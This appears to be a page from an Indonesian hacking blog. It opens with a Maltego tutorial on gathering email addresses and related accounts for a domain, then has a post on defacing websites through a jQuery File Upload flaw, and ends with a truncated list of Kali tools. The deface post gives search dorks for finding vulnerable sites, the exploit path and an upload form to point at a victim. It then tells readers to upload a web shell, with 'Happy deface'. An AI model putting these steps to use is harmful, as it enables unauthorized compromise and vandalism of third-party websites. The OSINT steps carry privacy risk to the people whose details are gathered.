Istilah open source disini tidak ada hubungannya dengan kode program. Secara gamblang, OSINT dilakukan dengan mengumpulkan data yang dapat di peroleh secara publik, misalnya sesuatu yang dapat dicari di Google.

Berbeda dengan hasil pencarian search engine, sebuah layer presentasi untuk OSINT hanya menampilkan data yang relevan dan dalam format yang mudah ditelusuri sehingga pengguna dapat mencari hubungan dari hasil yang ditemukan.

Maltego adalah sebuah tools yang dibuat dari Java untuk keperluan OSINT. Tool ini telah tersedia di Kali Linux sehingga siap untuk dipakai.
Maltego di bedakan menjadi versi komersial (commercial edition) dan versi gratis (community edition).

Versi gratis yang tersedia di Kali Linux hanya dapat menampilkan maksimal 12 hasil transformasi dan membutuhkan proses registrasi.
Sebagai sebuah front-end untuk server OSINT,
Maltego versi gratis hanya dapat memakai layanan server milik Paterva.

Karena versi yang disediakan oleh Kali Linux adalah versi gratis dari Maltego,
saya harus mendaftarkan sebuah akun terlebih dahulu di situs https://www.paterva.com/web6/community/maltego/index.php.
Saya dapat menjalankan Maltego dengan memberikan perintah berikut ini:
 # Maltego
Pada saat pertama kali dijalankan, layar Welcome to Maltego! akan muncul.
Setelah men-klik tombol Next, saya perlu email dan password sesuai dengan yang saya pakai pada saat mendaftar sebelumnya.

Setelah men-klik Next, proses login akan dilakukan.
Bila berhasil, saya akan memperoleh API key yang aktif selama dua hari (setelah itu, saya perlu mengaktifkannya kembali).
Saya kemudian men-klik tombol Next dua kali.
Pada langkah terakhir, saya memilih Run a machine (NEW!!) dan men-klik tombol Finish.

Pada dialog yang muncul, saya dapat memilih jenis pekerjaan yang akan di lakukan.
Disini saya dapat memilih untuk mencari email address yang berkaitan dengan sebuah perusahaan atau seseorang, tweet yang mengandung kata tertentu, atau informasi lebih lanjut mengenai sebuah URL.

Sebagai latihan, saya memilih Footprint L3 untuk mencari informasi lebih lanjut mengenai sebuah domain.
 Setelah men-klik tombol Next, saya dapat memasukkan nama domain, anggap saja test.com.
Setelah itu, saya men-klik tombol Finish.

Saya akan menemukan window Running machine yang sedang bekerja di sisi kanan workspace.
Selain itu, terdapat dialog yang memberikan panduan filter dimana saya harus memilih nama domain yang relevan dan men-klik tombol Next agar progress dapat berlanjut.

Maltego akan menampilkan informasi dalam bentuk tree dimana setiap node selalu terhubung ke node lainnya.
Setiap node dapat disusun sedemikian rupa oleh pengguna agar mudah di baca.

Sebuah node dalam tree di Maltego disebut sebagai entity.
Sebuah entity mewakili informasi seperti nama DNS, alamat email, akun Facebook, nomor telepon, dan sebagainya.

Melihat hubungan antar setiap entity saja tidak cukup.
Bila saya men-klik kanan sebuah entity, saya akan menemukan menu Run Transform yang dapat saya pakai untuk menghasilkan sebuah entity baru dari yang sudah ada.

Sebagai contoh, saya ingin mencari tahu apa saja email (berdasarkan hasil search engine) yang berkaitan dengan entity berupa sebuah domain.
Bila domain dimiliki oleh sebuah perusahaan, maka biasanya yang di kembalikan adalah alamat email karyawannya.

Saya men-klik kanan entity domain tersebut, kemudian memilih Run Transform, Email addresses from Domain, To Emails @domain [using Search Engine].
Maltego akan menciptakan beberapa entity baru yang mewakili email yang di temukan.
Entity baru tersebut akan memiliki link (terhubung) ke entity domain (sebagai sumber transformasi).

Saya kemudian memilih salah satu dari entity yang mewakili email yang di temukan.
Saya kemudian men-klik kanan entity tersebut, memilih Run Transform, Related Email Addresses, All in this set.
Maltego akan kembali membuat beberapa entity email baru yang merupakan email yang berhubungan dengan email yang saya pilih.

Sama seperti pencarian melalui search engine, tidak selamanya hasil yang di kembalikan akurat,
jadi saya masih perlu memilah mana yang relevan.
Bila setelah penesuluran saya menemukan entity yang salah,
saya dapat memilih entity tersebut beserta seluruh children-nya dengan men-klik tombol Select Children atau Add Children di menu Investigate lalu menekan tombol Del di keyboard.

Setelah melakukan transformasi To URLs [Show search engine results], saya menemukan beberapa URL menarik yang berhubungan dengan si pemilik email.

Bila investigasi di lakukan pada entity berupa website,
Maltego dapat menampilkan relasi ke entity lain dalam jenis BuiltWith Technology seperti entity Google Webmaster, jQuery, Quantcast Measurement, dan sebagainya.

Kesimpulannya: Saya dapat memperoleh semua informasi yang ada dengan menggunakan search engine, tool whois, menganalisa HTML dan sebagainya.

Tetapi cara manual tentu saja lebih repot. Front-end OSINT seperti Maltego mempermudah pekerjaan saya dengan menyediakan cara gampang untuk memahami atau mencari pola dari sekian banyak informasi yang ada. :)

Exhacking.net - Definisi Open Source Intelligence (OSINT ) berdasarkan departemen pertahanan ( DoD ) Amerika adalah inteligensi yang di...

26/05/16

Cara Deface dengan JQuery File Upload Vulnerability

Exhacking.net -  Kali ini ane akan menjelaskan bug atau celah pada salah satu web CMS Wordpress.
tapi gak semua web memiliki celah seperti ini ya ^^ langsung aja deh :D
Dork :
inurl:"assets/global/plugins/jquery-file-upload/" 
intext:"assets/global/plugins/jquery-file-upload/" 
inurl:"/assets/global/plugins/jquery-file-upload/server/php/files/"
Exploit : /assets/global/plugins/jquery-file-upload/server/php/
Jika Vuln maka tampilannya sama seperti "FormCraft" 
Lalu copy script CSRF ini :
<form method="POST" action="http://www.target.com/assets/global/plugins/jquery-file-upload/server/php/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
Silahkan save di notepad atau apalah dengan format html, jangan lupa ganti bagian http://www.target.com dengan URL target kalian yang sudah di dapat dari dork tadi,
jika sudah selesai kalian tinggal buka dengan web browser dan penampakannya akan seperti ini
 
Selanjutnya tinggal kalian Upload shellnya,
Jika upload berhasil maka akan tampil nama shell kalian (contoh liat gambar di bawah), jika nama shell kalian tidak tampil,
ane saranin cari target lain ^_^

Happy deface ;)
sekian tutor kali ini , semoga bermanfaat.
kalo ada kesalahan ane mohon maaf ^^

Exhacking.net -  Kali ini ane akan menjelaskan bug atau celah pada salah satu web CMS Wordpress. tapi gak semua web memiliki celah seperti ...

25/05/16

Tools Hacking Yang Ada di Kali-Linux


{+} Information Gathering acccheck ace-voip Amap Automater bing-ip2hosts braa ...